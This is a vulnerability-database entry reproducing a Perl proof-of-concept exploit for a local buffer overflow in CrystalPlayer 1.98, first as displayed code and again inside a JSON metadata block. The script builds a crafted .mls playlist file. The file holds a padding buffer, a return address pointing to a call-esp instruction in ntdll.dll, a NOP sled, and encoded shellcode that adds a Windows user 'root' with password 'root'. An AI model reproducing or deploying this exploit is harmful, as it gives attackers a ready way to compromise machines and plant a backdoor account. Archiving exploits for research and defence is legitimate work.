Search...

CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit

2007-07-31T00:00:00

ID SSV:7100
Type seebug
Reporter Root
Modified 2007-07-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl
######################################################################################################################
#Crystal&nbsp;Player&nbsp;1.98
#Playlist(.mls)&nbsp;File&nbsp;Local&nbsp;Buffer&nbsp;Overflow&nbsp;Exploit
#Source::&nbsp;http://www.crystalplayer.com/CrystalPro.exe
#Credit&nbsp;To&nbsp;Timq&nbsp;For&nbsp;The&nbsp;Vulnerability
#POC&nbsp;By&nbsp;Arham&nbsp;Muhammad
#######################################################################################################################

#While&nbsp;Debugging&nbsp;EIP&nbsp;And&nbsp;EBP&nbsp;Successfully&nbsp;Gets&nbsp;Overwritten!
#Upon&nbsp;Successful&nbsp;Exploitation,&nbsp;DOS&nbsp;Occurs&nbsp;And&nbsp;It&nbsp;Further&nbsp;Destorys&nbsp;The&nbsp;Libraries,Upon&nbsp;Successful&nbsp;Exploitation
#When&nbsp;The&nbsp;Next&nbsp;Time&nbsp;App&nbsp;Is&nbsp;Executed
#It&nbsp;Throws&nbsp;Microsfot&nbsp;Visual&nbsp;C++&nbsp;Runtime&nbsp;Library&nbsp;Error&nbsp;Followed&nbsp;By&nbsp;An&nbsp;Other&nbsp;Exception
#The&nbsp;POC&nbsp;Add&nbsp;user&nbsp;&quot;root&quot;&nbsp;with&nbsp;password&nbsp;&quot;root&quot;&nbsp;to&nbsp;the&nbsp;os!
#Tested&nbsp;On&nbsp;x86&nbsp;vista&nbsp;enterprise&nbsp;ed.
#Might&nbsp;require&nbsp;Changing&nbsp;esp&nbsp;address&nbsp;coz&nbsp;of&nbsp;os&nbsp;and&nbsp;sp&nbsp;change


print&nbsp;&quot;Crystal&nbsp;Player&nbsp;1.98&nbsp;Local&nbsp;Bufferoverflow&nbsp;Exploit\n&quot;;
print&nbsp;&quot;Creating&nbsp;Crafted&nbsp;.mls&nbsp;File\n&quot;;


$buff&nbsp;=&nbsp;'A'&nbsp;x&nbsp;1033;


$ret&nbsp;=&nbsp;&quot;\x76\xF5\x48\x37&quot;;&nbsp;#call&nbsp;esp&nbsp;in&nbsp;ntdll.dll



#&nbsp;win32_adduser&nbsp;-&nbsp;PASS=root&nbsp;EXITFUNC=seh&nbsp;USER=root&nbsp;Size=232&nbsp;Encoder=PexFnstenvSub&nbsp;http://metasploit.com
$shellcode&nbsp;=&nbsp;&quot;\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xea&quot;.&nbsp;#Add&nbsp;user&nbsp;root&nbsp;with&nbsp;pass&nbsp;root&nbsp;232&nbsp;bytes
&quot;\x15\xcd\x86\x83\xeb\xfc\xe2\xf4\x16\xfd\x89\x86\xea\x15\x46\xc3&quot;.
&quot;\xd6\x9e\xb1\x83\x92\x14\x22\x0d\xa5\x0d\x46\xd9\xca\x14\x26\xcf&quot;.
&quot;\x61\x21\x46\x87\x04\x24\x0d\x1f\x46\x91\x0d\xf2\xed\xd4\x07\x8b&quot;.
&quot;\xeb\xd7\x26\x72\xd1\x41\xe9\x82\x9f\xf0\x46\xd9\xce\x14\x26\xe0&quot;.
&quot;\x61\x19\x86\x0d\xb5\x09\xcc\x6d\x61\x09\x46\x87\x01\x9c\x91\xa2&quot;.
&quot;\xee\xd6\xfc\x46\x8e\x9e\x8d\xb6\x6f\xd5\xb5\x8a\x61\x55\xc1\x0d&quot;.
&quot;\x9a\x09\x60\x0d\x82\x1d\x26\x8f\x61\x95\x7d\x86\xea\x15\x46\xee&quot;.
&quot;\xd6\x4a\xfc\x70\x8a\x43\x44\x7e\x69\xd5\xb6\xd6\x82\xe5\x47\x82&quot;.
&quot;\xb5\x7d\x55\x78\x60\x1b\x9a\x79\x0d\x76\xa0\xe2\xc4\x70\xb5\xe3&quot;.
&quot;\xca\x3a\xae\xa6\x84\x70\xb9\xa6\x9f\x66\xa8\xf4\xca\x67\xa2\xe9&quot;.
&quot;\x9e\x35\xbf\xe9\x85\x61\xed\xa9\xab\x51\x89\xa6\xcc\x33\xed\xe8&quot;.
&quot;\x8f\x61\xed\xea\x85\x76\xac\xea\x8d\x67\xa2\xf3\x9a\x35\x8c\xe2&quot;.
&quot;\x87\x7c\xa3\xef\x99\x61\xbf\xe7\x9e\x7a\xbf\xf5\xca\x67\xa2\xe9&quot;.
&quot;\x9e\x35\xe2\xc7\xae\x51\xcd\x86&quot;;


$nopsled&nbsp;=&nbsp;&quot;\x90&quot;&nbsp;x&nbsp;797;&nbsp;#Nopsled&nbsp;to&nbsp;fill&nbsp;the&nbsp;buffer



open(mls,&nbsp;&quot;&gt;./buffer.mls&quot;);
print&nbsp;mls&nbsp;&quot;$buff&quot;;
print&nbsp;mls&nbsp;&quot;$ret&quot;;
print&nbsp;mls&nbsp;&quot;$nopsled&quot;;
print&nbsp;mls&nbsp;&quot;$shellcode&quot;;


print&nbsp;&quot;Crafted&nbsp;File&nbsp;Created!\n&quot;;


#Arham&nbsp;Muhammad
#rko.thelegendkiller@&nbsp;gmail.com

#Greets::&nbsp;str0ke,Hackman,tushy,And&nbsp;All&nbsp;My&nbsp;Friends,&nbsp;Specially&nbsp;AmBi(Love&nbsp;Ya!!!);
#Gr0undbreakerz

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-7100", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-07-31T00:00:00", "title": "CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-7100", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-07-31T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n######################################################################################################################\r\n#Crystal Player 1.98\r\n#Playlist(.mls) File Local Buffer Overflow Exploit\r\n#Source:: http://www.crystalplayer.com/CrystalPro.exe\r\n#Credit To Timq For The Vulnerability\r\n#POC By Arham Muhammad\r\n#######################################################################################################################\r\n\r\n#While Debugging EIP And EBP Successfully Gets Overwritten!\r\n#Upon Successful Exploitation, DOS Occurs And It Further Destorys The Libraries,Upon Successful Exploitation\r\n#When The Next Time App Is Executed\r\n#It Throws Microsfot Visual C++ Runtime Library Error Followed By An Other Exception\r\n#The POC Add user "root" with password "root" to the os!\r\n#Tested On x86 vista enterprise ed.\r\n#Might require Changing esp address coz of os and sp change\r\n\r\n\r\nprint "Crystal Player 1.98 Local Bufferoverflow Exploit\\n";\r\nprint "Creating Crafted .mls File\\n";\r\n\r\n\r\n$buff = 'A' x 1033;\r\n\r\n\r\n$ret = "\\x76\\xF5\\x48\\x37"; #call esp in ntdll.dll\r\n\r\n\r\n\r\n# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub http://metasploit.com\r\n$shellcode = "\\x2b\\xc9\\x83\\xe9\\xcc\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xea". #Add user root with pass root 232 bytes\r\n"\\x15\\xcd\\x86\\x83\\xeb\\xfc\\xe2\\xf4\\x16\\xfd\\x89\\x86\\xea\\x15\\x46\\xc3".\r\n"\\xd6\\x9e\\xb1\\x83\\x92\\x14\\x22\\x0d\\xa5\\x0d\\x46\\xd9\\xca\\x14\\x26\\xcf".\r\n"\\x61\\x21\\x46\\x87\\x04\\x24\\x0d\\x1f\\x46\\x91\\x0d\\xf2\\xed\\xd4\\x07\\x8b".\r\n"\\xeb\\xd7\\x26\\x72\\xd1\\x41\\xe9\\x82\\x9f\\xf0\\x46\\xd9\\xce\\x14\\x26\\xe0".\r\n"\\x61\\x19\\x86\\x0d\\xb5\\x09\\xcc\\x6d\\x61\\x09\\x46\\x87\\x01\\x9c\\x91\\xa2".\r\n"\\xee\\xd6\\xfc\\x46\\x8e\\x9e\\x8d\\xb6\\x6f\\xd5\\xb5\\x8a\\x61\\x55\\xc1\\x0d".\r\n"\\x9a\\x09\\x60\\x0d\\x82\\x1d\\x26\\x8f\\x61\\x95\\x7d\\x86\\xea\\x15\\x46\\xee".\r\n"\\xd6\\x4a\\xfc\\x70\\x8a\\x43\\x44\\x7e\\x69\\xd5\\xb6\\xd6\\x82\\xe5\\x47\\x82".\r\n"\\xb5\\x7d\\x55\\x78\\x60\\x1b\\x9a\\x79\\x0d\\x76\\xa0\\xe2\\xc4\\x70\\xb5\\xe3".\r\n"\\xca\\x3a\\xae\\xa6\\x84\\x70\\xb9\\xa6\\x9f\\x66\\xa8\\xf4\\xca\\x67\\xa2\\xe9".\r\n"\\x9e\\x35\\xbf\\xe9\\x85\\x61\\xed\\xa9\\xab\\x51\\x89\\xa6\\xcc\\x33\\xed\\xe8".\r\n"\\x8f\\x61\\xed\\xea\\x85\\x76\\xac\\xea\\x8d\\x67\\xa2\\xf3\\x9a\\x35\\x8c\\xe2".\r\n"\\x87\\x7c\\xa3\\xef\\x99\\x61\\xbf\\xe7\\x9e\\x7a\\xbf\\xf5\\xca\\x67\\xa2\\xe9".\r\n"\\x9e\\x35\\xe2\\xc7\\xae\\x51\\xcd\\x86";\r\n\r\n\r\n$nopsled = "\\x90" x 797; #Nopsled to fill the buffer\r\n\r\n\r\n\r\nopen(mls, ">./buffer.mls");\r\nprint mls "$buff";\r\nprint mls "$ret";\r\nprint mls "$nopsled";\r\nprint mls "$shellcode";\r\n\r\n\r\nprint "Crafted File Created!\\n";\r\n\r\n\r\n#Arham Muhammad\r\n#rko.thelegendkiller@ gmail.com\r\n\r\n#Greets:: str0ke,Hackman,tushy,And All My Friends, Specially AmBi(Love Ya!!!);\r\n#Gr0undbreakerz\n ", "id": "SSV:7100", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:00:49", "reporter": "Root", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2017-11-19T22:00:49", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:00:49", "rev": 2}, "vulnersScore": 0.6}, "references": []}